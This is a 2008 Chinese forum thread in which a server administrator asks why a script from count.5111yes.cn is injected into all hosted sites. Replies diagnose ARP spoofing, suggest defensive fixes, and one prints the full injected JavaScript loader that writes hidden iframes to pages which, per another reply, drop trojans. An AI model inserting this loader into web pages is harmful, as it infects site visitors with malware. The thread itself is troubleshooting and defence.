我的web服务器出问题了

浩飞__ 2008-03-31 11:02:24
我有一台web服务器,是用来放客户网站的。
今天突然发现,服务器上面所有网站的源代码中都被加入<script src=http://count.5111yes.cn/count/js/1.js></script>这个代码
但我登录服务器直接打开源文件,却找不到相应的代码

用McAfee杀毒软件杀,也查不到任何木马或病毒

各个搜索引擎我都找遍了,都没查到相关资料(有也就是本机中木马的解决方法,不对路啊)

请教高手是怎么回事,我应该怎么处理?谢谢
...全文
223 9 打赏 收藏 转发到动态 举报
写回复
用AI写文章
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
浩飞__ 2008-04-03
  • 打赏
  • 举报
回复
谢谢楼上这位朋友,装ARP防火墙好了
马上结帖
Mnky 2008-04-01
  • 打赏
  • 举报
回复
在他嵌入的两个页面中tj.htm只是记录访问量;
music.htm中含有多个木马,下载并通过csrss.exe运行 microsofts.vbs、microsofts.pif等木马。
Mnky 2008-04-01
  • 打赏
  • 举报
回复
去搜一下“ARP病毒”
楼主你网段上有人中了这个病毒,冒充网关,引你的电脑通过他上网,并在所有访问的网页前加上一句,下载木马。
解决方法(以下均可):
在hosts文件中屏蔽掉count.5111yes.cn这个网站;
找到那台中毒的电脑,杀毒;
到路由器限制那台中毒的电脑;
安装ARP防火墙。
浩飞__ 2008-04-01
  • 打赏
  • 举报
回复
晕倒。。。
Forever_Young 2008-04-01
  • 打赏
  • 举报
回复

function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=sb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http:\/\/count.5111yes.cn\/count\/js\/music.htm\" width=100 height=1><\/IFRAME>");
document.writeln("<iframe src=http:\/\/count.5111yes.cn\/count\/js\/tj.htm width=0 height=0><\/iframe>");
}
}Get();


加这个进去干嘛,两个嵌套窗口,一个是空白的,一个好像是什么统计,是不是想偷访问量,呵呵
renjun24 2008-04-01
  • 打赏
  • 举报
回复
关注
monica888 2008-03-31
  • 打赏
  • 举报
回复
哎这就麻烦了,不是我吓你,很有可能你会被炒犹豫,然后你的老婆孩子会无家可归,最后你会一无所有在街头上永远流浪,最后由清洁工在某个地下水道里将你打捞出来,从此你成为夜魔侠跟忍者神龟的化身,你拥有
雄的力量

豹的速度

鹰的眼睛

狼的眼朵

啊 拉风吧
浩飞__ 2008-03-31
  • 打赏
  • 举报
回复
那如果我被黑了应该怎么处理了???
monica888 2008-03-31
  • 打赏
  • 举报
回复
你ping一下这个站点的IP 试着穷举他站内的所有文件,假如都是放一些脚本文件,你就要肯定你被黑了。

6,871

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧